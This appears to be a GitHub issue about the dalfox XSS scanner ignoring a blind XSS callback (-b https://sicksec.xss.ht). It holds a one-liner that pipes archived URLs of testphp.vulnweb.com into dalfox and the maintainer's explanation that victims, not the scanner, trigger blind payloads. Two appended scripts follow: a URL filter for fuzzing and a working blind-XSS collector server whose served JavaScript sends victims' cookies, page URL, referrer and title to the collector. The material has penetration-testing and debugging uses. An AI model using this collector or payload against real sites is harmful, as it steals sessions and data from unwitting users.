dalfox: Blind XSS payload is ignored

Summary

Hello. First of all, thanks for the awesome tool. I wanted to make a BXSS attack one-liner and I used your tool to perform such an action.

Description

XSS gets triggered but my blind XSS is ignored … (asciicast) After visiting the links, the payload used is not my BXSS payload.

Command

echo "testphp.vulnweb.com" |  waybackurls | anti-burl | grep -Eo "https?://[^\"\\'> ]+" | grep "=" | grep -v ".jpg\|.png\|.css\|.js" | dalfox pipe -b https://sicksec.xss.ht

Requirement

go get -v github.com/tomnomnom/waybackurls
go get -v github.com/tomnomnom/hacks/anti-burl

System Config

Ubuntu 18.04, Go 1.14, Dalfox 1.1.2
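The one-liner above filters waybackurls output with a chain of greps. Two of those filters are looser than they look: `grep -v ".jpg\|.png\|.css\|.js"` matches the dot as "any character" and matches anywhere in the URL, so it also discards targets such as `/api/data?json=1`, and nothing deduplicates URLs that differ only in parameter values, so dalfox retests the same parameters many times. The following script is an added example (not part of dalfox, waybackurls or the original report) that can replace the grep chain in front of `dalfox pipe`; the sample input at the bottom is constructed and the static-extension list is an assumption:

```python
#!/usr/bin/env python3
"""Drop-in replacement for the grep chain that feeds `dalfox pipe`
(added example, not part of dalfox or the original report).

Reads candidate URLs on stdin and writes those worth fuzzing to stdout:
  - http(s) URLs only,
  - at least one query parameter (no parameter, nothing for dalfox to test),
  - static assets dropped by the path's real extension, not by substring
    (`grep -v ".js"` also throws away e.g. /api/data?json=1),
  - one URL per (host, path, set of parameter names), so dalfox does not
    retest the same parameters with different values.
"""
import sys
from urllib.parse import parse_qsl, urlsplit

# Assumed list of extensions that never carry reflected parameters.
STATIC_EXT = {".jpg", ".jpeg", ".png", ".gif", ".svg", ".css", ".js",
              ".woff", ".woff2", ".ico", ".pdf"}


def is_candidate(url: str) -> bool:
    """True if the URL is http(s), has a query string and is not a static asset."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    if not parse_qsl(parts.query, keep_blank_values=True):
        return False
    # Look only at the last path segment, so "/v1.2/search" is not treated as an extension.
    last_segment = parts.path.rsplit("/", 1)[-1].lower()
    ext = last_segment[last_segment.rfind("."):] if "." in last_segment else ""
    return ext not in STATIC_EXT


def dedupe_key(url: str) -> tuple:
    """Identity of an injection target: origin, path and sorted parameter names."""
    parts = urlsplit(url.strip())
    names = tuple(sorted(k for k, _ in parse_qsl(parts.query, keep_blank_values=True)))
    return (parts.scheme, parts.netloc.lower(), parts.path, names)


def filter_urls(lines) -> list:
    """Apply is_candidate() and dedupe_key() to an iterable of URL lines."""
    seen, kept = set(), []
    for line in lines:
        url = line.strip()
        if not url or not is_candidate(url):
            continue
        key = dedupe_key(url)
        if key in seen:
            continue
        seen.add(key)
        kept.append(url)
    return kept


# Constructed sample input, standing in for waybackurls output.
SAMPLE = [
    "http://testphp.vulnweb.com/listproducts.php?cat=1",
    "http://testphp.vulnweb.com/listproducts.php?cat=2",        # same params as above
    "http://testphp.vulnweb.com/listproducts.php?cat=1&artist=3",
    "http://testphp.vulnweb.com/images/logo.png?v=3",            # static asset
    "http://testphp.vulnweb.com/api/data?json=1",                # grep -v ".js" would drop this
    "http://testphp.vulnweb.com/index.php",                      # no parameters
    "https://testphp.vulnweb.com/search.php?test=",
    "",
]

if __name__ == "__main__":
    # Pipe URLs in; with no stdin attached, run on the constructed sample.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE
    for url in filter_urls(source):
        print(url)
```

In the original pipeline it slots in after the `grep -Eo` that extracts URLs: `... | grep -Eo "https?://[^\"\\'> ]+" | python3 filter_urls.py | dalfox pipe -b https://sicksec.xss.ht`. The deduplication key deliberately ignores parameter values: dalfox injects into the parameter, so two URLs with the same parameter names are the same test.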

About this issue

  • State: closed
  • Created 4 years ago
  • Comments: 17 (10 by maintainers)

Most upvoted comments

Hi @ceylanb 😄 Is the page vulnerable to blind XSS? As mentioned above, blind XSS needs the victim to access the XSS code to trigger it.

I do not judge that this is a problem. The -b option is to pass the blind XSS code along for blind XSS testing. The scanner should never trigger this. What appears on the screen is a DOM verify (trigger)/reflected result of basic XSS testing, and the blind XSS is supposed to cross over to xsshunter when triggered by the actual victim.

Conversely, if dalfox triggers the blind XSS, that's really a bad idea and a problem. Scanners only deliver blind XSS; the trigger is the victim's role.
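The maintainer's point is that a blind XSS payload has two separate halves: the scanner delivers a payload that references the `-b` callback, and nothing reaches that callback until some browser later renders the page where the payload landed. The script below is an added example, not dalfox or xsshunter code, of the receiving half: a minimal self-hosted collector you could point `-b` at instead of xsshunter. It assumes dalfox embeds the `-b` URL in a script-loading payload (the exact payload template is not shown on this page), serves the probe JavaScript at `/p`, and records each firing at `/report`; the hostnames, paths and the sample report in the test are constructed.

```python
#!/usr/bin/env python3
"""Minimal self-hosted blind-XSS callback collector (added example; not dalfox
or xsshunter code).

Usage:  python3 bxss_collector.py 0.0.0.0 8080
        dalfox url ... -b http://<collector-host>:8080/p      # assumed -b usage

The scanner only delivers the payload. Nothing arrives here until a browser
renders a page containing it; the JS served at /p then POSTs context to /report.
For real use put this behind a TLS reverse proxy that sets X-Forwarded-Proto,
otherwise an https victim page will refuse to load an http:// script.
"""
import json
import sys
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer

HITS = []  # in-memory store: one dict per triggered callback


def probe_js(report_url: str) -> str:
    """JavaScript served to the victim's browser; it reports where it fired."""
    url = json.dumps(report_url)  # safely quoted JS string literal
    return (
        "(function(){try{var d={u:location.href,r:document.referrer,"
        "c:document.cookie,t:document.title,o:window.origin};"
        "var b=JSON.stringify(d);"
        "navigator.sendBeacon?navigator.sendBeacon(%s,b):"
        "fetch(%s,{method:'POST',mode:'no-cors',body:b});}catch(e){}})();"
        % (url, url)
    )


def record_report(body: bytes, client_ip: str, user_agent: str, store=None) -> dict:
    """Parse a /report POST body and append a hit record. Returns the record.

    Tolerates non-JSON bodies: a scanner or crawler poking the endpoint still
    produces a record, which is itself useful signal about who reached it."""
    store = HITS if store is None else store
    try:
        data = json.loads(body.decode("utf-8", "replace"))
        if not isinstance(data, dict):
            data = {"raw": data}
    except ValueError:
        data = {"raw": body.decode("utf-8", "replace")}
    hit = {
        "time": datetime.now(timezone.utc).isoformat(),
        "ip": client_ip,
        "ua": user_agent,
        "page": str(data.get("u", ""))[:2048],      # where the payload fired
        "referrer": str(data.get("r", ""))[:2048],
        "origin": str(data.get("o", "")),
        "title": str(data.get("t", ""))[:256],
        "has_cookie": bool(data.get("c")),          # stored as a flag, not the value
    }
    store.append(hit)
    return hit


class Collector(BaseHTTPRequestHandler):
    def _send(self, code, ctype, body):
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if self.path.split("?")[0] == "/p":
            proto = self.headers.get("X-Forwarded-Proto", "http")
            report = "%s://%s/report" % (proto, self.headers.get("Host", "localhost"))
            self._send(200, "application/javascript", probe_js(report).encode())
        else:
            self._send(404, "text/plain", b"")

    def do_POST(self):
        if self.path.split("?")[0] != "/report":
            return self._send(404, "text/plain", b"")
        length = int(self.headers.get("Content-Length") or 0)
        hit = record_report(self.rfile.read(min(length, 65536)),
                            self.client_address[0],
                            self.headers.get("User-Agent", ""))
        sys.stderr.write("[hit] %s %s from %s (%s)\n"
                         % (hit["time"], hit["page"], hit["ip"], hit["ua"]))
        self._send(204, "text/plain", b"")

    def log_message(self, fmt, *args):  # keep stdout quiet; hits go to stderr
        pass


if __name__ == "__main__":
    host, port = sys.argv[1], int(sys.argv[2])
    HTTPServer((host, port), Collector).serve_forever()
```

Reading the hits is where the delivery/trigger distinction becomes visible. During the scan itself you expect no hits at all: dalfox reports its reflected and DOM findings on the console, and, as the maintainer says, should never execute the blind payload. Hits that show up hours or days later, from other client addresses and with a `page` and `referrer` inside the target application (an admin panel, a log viewer), are the blind XSS actually firing. A hit arriving from the scanner host while the scan is running would mean the scanner executed the payload itself, which is exactly the behaviour the maintainer calls a problem.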